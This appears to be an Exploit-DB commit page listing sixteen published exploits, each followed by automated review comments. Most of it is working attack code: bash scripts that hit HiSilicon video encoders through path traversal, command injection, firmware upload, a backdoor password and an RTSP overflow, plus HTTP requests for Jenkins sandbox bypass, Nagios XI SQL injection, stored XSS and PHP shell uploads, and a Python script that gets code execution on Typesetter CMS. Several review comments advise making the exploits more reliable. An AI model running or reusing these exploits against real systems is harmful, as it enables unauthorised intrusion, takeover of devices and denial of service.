DB: 2020-10-20

16 changes to exploits/shellcodes

Tourism Management System 1.0 - Arbitrary File Upload
Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
Online Student's Management System 1.0 - Remote Code Execution (Authenticated)
Online Discussion Forum Site 1.0 - XSS in Messaging System
Online Job Portal 1.0 - Cross Site Scripting (Stored)
HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal
HiSilicon Video Encoders - RCE via unauthenticated command injection
HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
HiSilicon Video Encoders - Full admin access via backdoor password
HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)
Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
Hostel Management System 2.1 - Cross Site Scripting (Multiple Fields)
Typesetter CMS 5.1 - Arbitrary Code Execution (Authenticated)
Textpattern CMS 4.6.2 - Cross-site Request Forgery
Offensive Security 2020-10-20 05:02:13 +00:00
parent 97ece9d27b
commit ae14b71248
17 changed files with 808 additions and 0 deletions

@ -0,0 +1,24 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated file disclosure via path traversal
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: https://www.szuray.com/
# Software Link: N/A
# Version: up to 1.97
# Tested on: Linux
# CVE: CVE-2020-24219
# Vendors: URayTech
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <filepath>"
echo "Example: $0 1.2.3.4:8086 /box/box.ini"
exit 1
fi
curl -s --path-as-is "http://$1/../../sys/devices/media/13070000.jpgd/../../../..$2" \
|| echo "ERROR: curl returned $?"

@ -0,0 +1,28 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <command>"
exit 1
fi
printf "executing the command... "
if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
then
echo "SUCCESS: remote command executed"
else
echo "ERROR: $?"
fi
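
Review bot: "SUCCESS: remote command executed" is printed whenever the POST completes, not when the command ran; `curl -sF ... >/dev/null` discards the response and exits 0 for any status code, so an unaffected web server gives the same message. The injection is blind, so the usage text should recommend an out-of-band command (a ping or wget back to a host the tester controls) and the script should use `-f` so a rejected upload at least reports an error. The vector, the multipart filename `logo;$2;.png`, also needs a note that `$2` must not contain a double quote, which would terminate the `filename` attribute before the command is seen.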

@ -0,0 +1,35 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "Usage: $0 <server>[:<port>] <command>"
exit 1
fi
printf "creating uk.rar... "
echo "$2" > uk.txt
rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
echo "done"
rm uk.txt
printf "uploading the RAR file... "
if curl -s -F 'upgrade=@uk.rar' http://$1 >/dev/null
then
echo "SUCCESS: remote command executed"
rm uk.rar
else
echo "ERROR: $?"
fi
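
Review bot: the `# CVE:` line repeats CVE-2020-24217 from the command-injection exploit above although this is a different vulnerability (firmware upload rather than a multipart filename injection); check the referenced VU#896979 note and give this file its own ID. In the script, `uk.txt` is left on disk when `rar` fails (the `rm uk.txt` comes after the `|| { ...; exit 2; }`) and `uk.rar` is left behind when curl fails; writing both into a `mktemp -d` directory and cleaning up in a `trap` would avoid littering the working directory. As in the previous file, `curl -s ... >/dev/null` exiting 0 is not evidence that the archive was unpacked and the command executed, so "SUCCESS" should read "upload accepted" unless the script verifies out-of-band.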

@ -0,0 +1,33 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - full admin access via backdoor password
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24215
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 1 ]
then
echo "Usage: $0 <server>[:<port>]"
exit 1
fi
printf "retrieving the password... "
password=$(curl -s --user admin:neworange88888888 http://$1/get_sys | \
grep -oP '(?<=<html_password>).*?(?=</html_password>)')
ret=$?
if [ "$ret" -eq 0 ]
then
echo "the password is '$password'"
echo "navigate to http://$1 and log into the admin interface with user 'admin' and password '$password'"
else
echo "ERROR: curl returned $ret"
fi
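
Review bot: `ret=$?` captures the exit status of `grep`, not of `curl`, because the assignment follows the pipeline; a refused connection is reported as "curl returned 1" (grep's no-match status) and a 401 from a device without the backdoor produces exactly the same message. Either `set -o pipefail` before the pipeline or test `"${PIPESTATUS[0]}"` inside the substitution, and print curl's status separately from "no <html_password> element found". It would also help to state in the header that `admin:neworange88888888` is the fixed backdoor credential the title refers to, so readers do not mistake it for a default the owner is expected to change.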

@ -0,0 +1,43 @@
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - unauthenticated RTSP buffer overflow (DoS)
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24214
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
echo "usage: $0 <server> <RTSP port>"
exit 1
fi
server=$1
port=$2
printf "checking the target... "
timeout 2 curl -s rtsp://$server:$port \
|| { echo "ERROR: no RTSP server found at $server:$port"; exit 2; }
printf "RTSP server detected\n"
cseq=$(printf "0%0.s" {1..3000})
printf "sending the payload... "
printf "OPTIONS /0 RTSP/1.0\nCSeq: %s\n\n" $cseq | telnet $server $port >/dev/null 2>&1
printf "done\n"
sleep 1
printf "checking the target again... "
if timeout 2 curl -s rtsp://$server:$port
then
echo "ERROR: the RTSP server still seems to be running :("
else
echo "SUCCESS: the server is down"
fi
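
Review bot: the payload is written with bare `\n` line endings, but RTSP, like HTTP, frames requests with CRLF; use `printf "OPTIONS /0 RTSP/1.0\r\nCSeq: %s\r\n\r\n"` so the overlong CSeq header is delivered the way a real client would send it. Pushing the bytes through `telnet` is fragile as well: it is absent on many systems and may close the connection before the 3000-byte header is flushed when stdin is a pipe; `nc -q 1` or bash's `/dev/tcp` is more predictable. Finally, both `timeout 2 curl -s rtsp://...` checks depend on curl having been built with RTSP support, and `-s` hides the reason when it was not, so "no RTSP server found" can be a false negative; mention it in the usage text or check `curl --version` for `rtsp` in its protocol list before running.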

@ -0,0 +1,33 @@
# Exploit Title: Jenkins 2.63 - Sandbox bypass in pipeline: Groovy plug-in
# Date: 8th October 2020
# Exploit Author: dmw0ng
# Vendor Homepage: https://www.jenkins.io
# Software Link: http://archives.jenkins-ci.org/windows/jenkins-2.63.zip
# Version: Jenkins 2.63
# Tested on: Ubuntu 18.04 / 20.04
# CVE : CVE-2019-1003030
GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
} HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
Connection: close
Upgrade-Insecure-Requests: 1
URL Encoding the following for RCE
```public class x {
public x(){
"ping -c 1 xx.xx.xx.xx".execute()
}
} ```
to
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
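
Review bot: the `# Version:` and `# Software Link:` lines point at Jenkins core 2.63, but the title and CVE-2019-1003030 concern the Pipeline: Groovy plug-in; say which component the 2.63 refers to and which plug-in version was tested, because the core version alone does not tell a reader whether a target is affected. The request also needs an authenticated session (`Cookie: JSESSIONID...`) with enough permission to reach `descriptorByName/.../checkScript`, which the header does not mention; add the required permission level. The first five lines show the raw Groovy broken across the request line; keeping only the URL-encoded form at the end, which is what is actually sent, avoids a reader pasting an invalid request.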

@ -0,0 +1,67 @@
#Exploit Title: Tourism Management System 1.0 - Arbitrary File Upload
#Date: 2020-10-19
#Exploit Author: Ankita Pal & Saurav Shukla
#Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/
#Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7204
#Version: V1.0
#Tested on: Windows 10 + xampp v3.2.4
Proof of Concept:::
Step 1: Open the affected URL http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
Step 2: Open Tour Package -> Create
Malicious Request:::
POST /Tourism%20Management%20System%20-TMS/tms/admin/create-package.php HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------63824304340061635682865592713
Content-Length: 1101
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/Tourism%20Management%20System%20-TMS/tms/admin/create-package.php
Cookie: PHPSESSID=q9kusr41d3em013kbe98b701id
Upgrade-Insecure-Requests: 1
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagename"
Pack1
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagetype"
Family
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagelocation"
Manali
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packageprice"
21
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagefeatures"
Free
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packagedetails"
Details
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="packageimage"; filename="file1.php"
Content-Type: application/octet-stream
<?php
phpinfo();
?>
-----------------------------63824304340061635682865592713
Content-Disposition: form-data; name="submit"
-----------------------------63824304340061635682865592713--
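
Review bot: the request goes to `/tms/admin/create-package.php` with a `PHPSESSID` cookie, so it needs an authenticated admin session; the title should say "(Authenticated)" as the other entries in this commit do. The PoC also stops at the upload: it never says where `file1.php` is stored or which URL serves it, so a reader cannot confirm that the `phpinfo()` executes; add the URL of the uploaded file as a final step. `Content-Length: 1101` will not match a hand-edited body, so note that it must be recomputed or dropped when replaying.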

@ -0,0 +1,34 @@
# Exploit Title: Nagios XI 5.7.3 - 'Contact Templates' Persistent Cross-Site Scripting
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists in the "Contact Templates" functionality of the Core Config Manager of Nagios XI.
# Vulnerable Parameter : tfName
# POC
# Exploit Details : The following request will create a contact template with an XSS payload as the contact template name. Click on "Relationships" for the malicious template to trigger the payload.
POST /nagiosxi/includes/components/ccm/index.php?type=contacttemplate&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 642
Origin: http://TARGET
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=contacttemplate&id=7&page=1&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
Upgrade-Insecure-Requests: 1
tfName=<img+src=a+onerror=alert(1)>&tfFriendly=&tfEmail=&tfPager=&Active=1&tfAddress1=&tfAddress2=&tfAddress3=&tfAddress4=&tfAddress5=&tfAddress6=&radHostNotifEnabled=2&selHostPeriod=0&radStatusInfos=2&radNoStatusInfos=2&radServiceNotifEnabled=2&selServicePeriod=0&radCanSubCmds=2&radContactgroup=2&radServicecommand=2&radHostcommand=2&txtVariablename=&txtVariablevalue=&cmd=submit&mode=modify&hidId=7&hidName=test&hidServiceDescription=&hostAddress=127.0.0.1&exactType=contacttemplate&type=contacttemplate&genericType=contacttemplate&returnUrl=index.php%3Fcmd%3Dview%26type%3Dcontacttemplate%26page%3D1&token=3b8273eea1213ac4d2c1f3da1b0c370d
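
Review bot: the request carries a session cookie and a `token=` value, and targets `mode=modify&hidId=7`, so it only works for an authenticated CCM user against an existing template with id 7; the header should say the PoC is authenticated, as the two SQL-injection entries below do, and that `hidId`, the `id` in the `Referer` and `token` must be taken from the tester's own session. Naming the sink in the Description (the "Relationships" view, per the exploit details line) rather than only in the walkthrough would let a reviewer locate where `tfName` is rendered unescaped.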

@ -0,0 +1,30 @@
# Exploit Title: Nagios XI 5.7.3 - 'Manage Users' Authenticated SQL Injection
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Manage Users" functionality of the Core Config Manager of Nagios XI.
# Vulnerable Parameter : id
# POC
POST /nagiosxi/includes/components/ccm/index.php?type=user&page=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/ccm/index.php?cmd=modify&type=user&id=2&page=1&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
Content-Type: application/x-www-form-urlencoded
Content-Length: 338
username=test&alias=test&password=password&confirm=password&active=1&id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)&cmd=admin&mode=modify&hidId=2&hidName=&hidServiceDescription=&hostAddress=127.0.0.1&exactType=user&type=user&genericType=user&returnUrl=index.php%3Fcmd%3Dadmin%26type%3Duser%26page%3D1&token=991611d98c6c8ea7d32c54522b346448
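
Review bot: the time-based payload in `id=2+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))A)` is sent together with `username=test&alias=test&password=password&confirm=password` and `mode=modify`, so replaying the PoC as written may overwrite the name and password of user 2 as a side effect; either say so in the details or use the target user's current values. `token=` is per-session and must be refreshed, which the PoC should state. The Description should also mention that the 5-second delay is the only observable and that `SLEEP()` is MySQL/MariaDB-specific.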

@ -0,0 +1,27 @@
# Exploit Title: Nagios XI 5.7.3 - 'SNMP Trap Interface' Authenticated SQL Injection
# Date: 10-18-2020
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
# Software Link: https://www.nagios.com/downloads/nagios-xi/
# Version: Nagios XI 5.7.3
# Tested on: Ubuntu 18.04
# Vulnerability Details
# Description : A blind SQL injection vulnerability exists in the "Add a Trap Definition" functionality of the SNMP Trap Interface of Nagios XI.
# Vulnerable Parameter : id
# POC
GET /nagiosxi/includes/components/nxti/index.php?event=test&oid=123&category=test&severity=test&desc=%3C%3E&format=&id=&SNMPTW%5Bhost%5D=&SNMPTW%5Bservice%5D=&SNMPTW%5Bseverity%5D=%24s&SNMPTW%5Boutput%5D=&exec%5B%5D=&raw-data=&mode=save&new=0&tab=3&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a) HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://TARGET/nagiosxi/includes/components/nxti/index.php
Cookie: nagiosxi=a354rem56a8aoeieqr9k2le39i
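
Review bot: the query string sends `id` twice, an empty `id=` in the middle and `id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)` at the end; PHP keeps the last occurrence, so the injection reaches the code, but the redundant empty `id=` should be dropped so the PoC does not rely on that parsing rule. Because the request uses `mode=save`, a successful replay also persists a trap definition named `test` with `desc=<>`; mention the cleanup. As with the previous entry, note that the 5-second `SLEEP(5)` delay is the only observable and is MySQL/MariaDB-specific.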

@ -0,0 +1,17 @@
# Exploit Title: Online Student's Management System 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020/10/18
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/14490/online-students-management-system-php-full-source-code-2020.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Proof of Concept:
1 - Go to http://localhost/studentrecord/ url, click "click here to sign in" text and login with the 070101:070101 information.
2 - Then go to http: //localhost/studentrecord/my-profile.php and upload your shell file from the upload new photo section and click the update button.
3 - Finally, open your shell in http://localhost/studentrecord/staffphoto/shell.php
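
Review bot: step 2's URL contains a stray space (`http: //localhost/...`) and will not paste as a working link. The PoC also uses the login `070101:070101` without saying where it comes from; state whether it is seeded in the bundled database or an account the author created, since "Authenticated" in the title is only meaningful with that context. Step 3 assumes the upload keeps the original filename under `staffphoto/`; one sentence on what the upload handler does (or does not) check for would explain why `shell.php` is reachable.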

@ -0,0 +1,17 @@
# Exploit Title: Online Discussion Forum Site 1.0 - XSS in Messaging System
# Google Dork: N/A
# Date: 2020-10-17
# Exploit Author: j5oh
# Vendor Homepage: https://www.sourcecodester.com/php/14233/online-discussion-forum-site.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14233&title=Online+Discussion+Forum+Site
# Version: 1.0 (REQUIRED)
# Tested on: Windows 10 / Wamp Server
# CVE : N/A
The messaging subsystem in the Online Discussion Forum is vulnerable to XSS in the message body. This will execute when viewing the messages page: http://localhost/Online%20Discussion%20Forum%20Site/messages.php.
XSS can be done through the messaging interface, go to http://localhos/Online%20Discussion%20Forum%20Site/messages.php, select 'Send New Message', search for the user to send the message to, click the 'Send Message' button next to the user, and add the javascript in the message body. Alternatively, if you know the user id you can just send the message directly thought the tt parameter of http://localhost/Online%20Discussion%20Forum%20Site/messageH.php.
# PoC:
curl -d 'uto=1&tt=<script> alert("XSS"); </script>' -b "PHPSESSID=798bkt3dkvoczjp7arnco3jf0c" http://localhost/Online%20Discussion%20Forum%20Site/messageH.php
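
Review bot: two typos in the walkthrough will trip readers: `http://localhos/...` is missing a `t`, and "send the message directly thought the tt parameter" should read "through". In the curl PoC, `-d` sends the body verbatim, so `<`, `>`, `"` and the spaces in the payload go unencoded; that happens to work because PHP splits only on `&` and `=`, but `--data-urlencode 'tt=<script>...'` is the robust form. The session cookie passed with `-b` is the sender's own, and the stored payload executes for the account that later opens `messages.php`; the description should say which account that is (the one selected via `uto`, if that is what the parameter means).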

@ -0,0 +1,17 @@
# Exploit Title: Online Job Portal 1.0 Cross Site Scripting (Stored)
# Google Dork: N/A
# Date: 2020/10/17
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://www.sourcecodester.com/php/13850/online-job-portal-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/jobportal.zip
# Version: 1.0
# Tested on: XAMPP
# CVE : N/A
Proof of Concept:
1 - Open URL http://localhost/jobportal/Employer/ManageJob.php
2 - Fill in the blanks with this payload: "><script>alert (1)</script>
3 - And click submit button.
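
Review bot: "Fill in the blanks with this payload" does not identify the vulnerable parameters; name the form fields on `Employer/ManageJob.php` that store the payload and the page where it renders, otherwise the entry is not reproducible and cannot be matched against a fix. The title also lacks the ` - ` separator used by every other entry in this commit (`Online Job Portal 1.0 - Cross Site Scripting (Stored)`), and `alert (1)` has a space before the parenthesis that is harmless but reads as a typo.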

@ -0,0 +1,39 @@
# Exploit Title: PHPGurukul hostel-management-system 2.1 allows XSS via
Guardian Name, Guardian Relation, Guardian Contact no, Address, City
# Google Dork: N/A
# Date: 2020-10-08
# Exploit Author: Kokn3t
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/hostel-management-system
# Version: V 2.1
# Tested on: Windows 10, Kali 2020.1
# CVE : CVE-2020-25270
######## Attack Vector ########
Install Hostel Management System V 2.1
1) User Module
Login as user and go to "Book Hostel"
(http:/localhost/hostel/book-hostel.php) and start booking.
Add malicious script in these fields - "<script>alert('XSS');</script>"
i. Guardian Name
ii. Guardian Relation
iii.Guardian Contact no
iv. Address
vi. City
After that will get a prompt "Student Successfully register" and after
pressing "See All", XSS will be triggered.
2) Admin Module
Login in as Admin and go to "Management Students", and "View Full details"
of booked student's record, XSS will be triggered also.
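
Review bot: the field list jumps from `iv. Address` to `vi. City` with no `v.`, and the booking URL `http:/localhost/hostel/book-hostel.php` is missing a slash after `http:`; both should be fixed before publishing. The user-side trigger ("pressing "See All"") should name the page that renders the stored fields, the way the admin-side trigger names "View Full details", so the sink can be located.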

exploits/php/webapps/48906.py Executable file

@ -0,0 +1,211 @@
# Exploit Title: Typesetter CMS 5.1 - Arbitrary Code Execution
# Exploit Author: Rodolfo "t0gu" Tavares
# Contact: @t0guu (TW)
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Linux / Apache
# Category: WebApp
# Google Dork: intext:"Powered by Typesetter"
# Date: 2020-09-29
# CVE : CVE-2020-25790
######## Description ########
#
# The CMS Typesetter has functionality (web interface) where it is possible
# through an account with privileges to perform uploads. Through this
# functionality, it is possible to upload a .zip file that contains a
# malicious .php file. In the same functionality, there is also the
# possibility to extract the file through the same web interface, the
# attacker only needs to extract the .zip that was previously loaded and
# click on the malicious .php file to execute commands in the operating
# system.
#
######## Exploit with Poc ########
https://github.com/t0gu/CVE-2020-25790
####### Code #######
# see the poc at https://github.com/t0gu/CVE-2020-25790
import argparse
from bs4 import BeautifulSoup
import requests
import sys
import re
import urllib3
from urllib3.exceptions import InsecureRequestWarning
banner = """
by: t0gu
usage: main.py [-h] -p PASSWORD -l LOGIN -u URL
==> Exploit for CVE 2020-25790
optional arguments:
-h, --help show this help message and exit
-p PASSWORD, --password PASSWORD
==> admin password
-l LOGIN, --login LOGIN
==> admin login
-u URL, --url URL ==> main URL
"""
print(banner)
menu = argparse.ArgumentParser(description="==> Exploit for CVE 2020-25790")
menu.add_argument("-p", "--password", required=True, help="==> admin password")
menu.add_argument("-l", "--login", required=True, help="==> admin login")
menu.add_argument("-u", "--url", required=True, help="==> main URL")
menu.add_argument("-f", "--file", required=True, help="==> Malicous zip file with php file inside")
args = menu.parse_args()
login = args.login
password = args.password
url = args.url
file = args.file
PROXIES = proxies = {
"http": "http://127.0.0.1:8080",
"https": "https://127.0.0.1:8080",
}
class Exploit:
def __init__(self, login, password, url, file):
self.login = login
self.password = password
self.url = url
self.user_agent = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari"
self.file = open(file, 'rb')
def get_nounce(self):
try:
url = self.url + "/Admin"
r = requests.get(url=url, headers={'User-Agent': self.user_agent}, timeout=3, verify=False)
data = r.text
soap_obj = BeautifulSoup(data, 'html.parser')
for inp in soap_obj.find_all("input"):
for v in inp:
nounce = v['value']
if nounce != None or nounce != "":
return nounce
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_hash_folders(self):
cookie_auth = self.get_cookies()
hash_verified = self.get_verified()
data_post = {'verified': hash_verified, 'cmd': 'open', 'target':'', 'init': 1, 'tree': 1}
try:
url = self.url + "/Admin_Finder"
r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': cookie_auth}, timeout=10, verify=False)
json_data = r.json()
hash_dir = json_data['files'][2]['hash']
return hash_dir
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_cookies(self):
nounce = self.get_nounce()
if nounce:
try:
url = self.url + "/Admin"
data_post = {'file': '', 'cmd': 'login', 'login_nonce': nounce, 'username': self.login, 'user_sha': '',
'password': self.password, 'pass_md5': '', 'pass_sha': '', 'pass_sha512': '',
'remember': 'on', 'verified': ''}
r = requests.post(url=url, verify=False, timeout=3, data=data_post, allow_redirects=False,
headers={'User-Agent': self.user_agent, 'Cookie': 'g=2'})
cookie_admin = r.headers['Set-Cookie']
cookie_name = cookie_admin.split(':')[0].split('=')[0]
cookie_value = cookie_admin.split(':')[0].split('=')[1].split(';')[0]
if cookie_name == None or cookie_name == "":
if cookie_value == None or cookie_value == "":
print("==> Something went wrong while login")
else:
data = f"{cookie_name}={cookie_value};"
return data
except (requests.exceptions.Timeout, requests.exceptions.BaseHTTPError) as e:
print(f'==> Error while login {e}')
def upload_zip(self):
url = self.url + '/Admin_Finder'
hash_verified = self.get_verified()
hash_dir = self.get_hash_folders()
auth_cookie = self.get_cookies()
try:
print(f"==> Uploading file: {self.file}")
data = {'cmd': "upload", "target": hash_dir, "verified": hash_verified}
r = requests.post(url=url, verify=False, timeout=10,
headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, data=data, files={'upload[]': self.file})
hash_file = r.json()['added'][0]['hash']
self.extract_file(auth_cookie, hash_file, hash_verified)
except (requests.exceptions.HTTPError, requests.exceptions.Timeout) as e:
print(f"==> Error while uploading {e}")
def extract_file(self, auth_cookie, hash_file, hash_verified):
data_post={'verified': hash_verified, 'cmd': 'extract', 'target': hash_file}
try:
url = self.url + "/Admin_Finder"
r = requests.post(url=url, data=data_post, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
name_file = r.json()['added'][0]['name']
print(f"==> All Hashes are collected from: {name_file}")
self.xpl(auth_cookie,name_file)
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def xpl(self, auth_cookie, name_file):
try:
url = self.url + "/data/_uploaded/file/" + name_file + "?cmd=id"
new_url = url.replace("index.php", "")
print(f"==> Try to exploit: {new_url}")
r = requests.get(url=new_url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
pattern = r'<pre>(.*?)</pre>'
m = re.search(pattern, r.text.replace("\n", ""))
if m is not None and m != "":
print(f"==> Vulnerable: {m.group(1)}")
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
def get_verified(self):
try:
url = self.url + "/Admin/Uploaded"
auth_cookie = self.get_cookies()
r = requests.get(url=url, headers={'User-Agent': self.user_agent, 'Cookie': auth_cookie}, timeout=10, verify=False)
data = r.text
pattern_regex = r'"verified":"(.*)"}'
m = re.search(pattern_regex, data)
if m is not None or m != "":
return m.group(1)
except (requests.exceptions.BaseHTTPError, requests.exceptions.Timeout) as e:
print(f'==> Error {e}')
if __name__ == "__main__":
obj = Exploit(login, password, url, file)
obj.upload_zip()
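
Review bot: the Python in this view has lost all leading indentation, so the control flow cannot be read from these lines; review the checked-in `48906.py` or the linked repository rather than this rendering. Points that hold regardless of indentation: `get_cookies()` is called from `get_hash_folders`, `get_verified` and `upload_zip`, and `get_hash_folders` also calls `get_verified`, so one run logs in four times and fetches a fresh nonce each time; log in once and reuse the session cookie. `hash_dir = json_data['files'][2]['hash']` hard-codes the third entry of the `open` response, which is fragile across installs; pick the target folder by name. `if nounce != None or nounce != ""` and `if m is not None or m != ""` are always true, so a missing nonce or a failed regex falls through to `m.group(1)` on `None`. Catching only `BaseHTTPError` and `Timeout` leaves `requests.exceptions.ConnectionError` (refused port, bad hostname) uncaught, so those cases traceback instead of printing `==> Error`; catch `requests.exceptions.RequestException`. `urllib3` and `InsecureRequestWarning` are imported but `disable_warnings` is never called, so every `verify=False` request prints a 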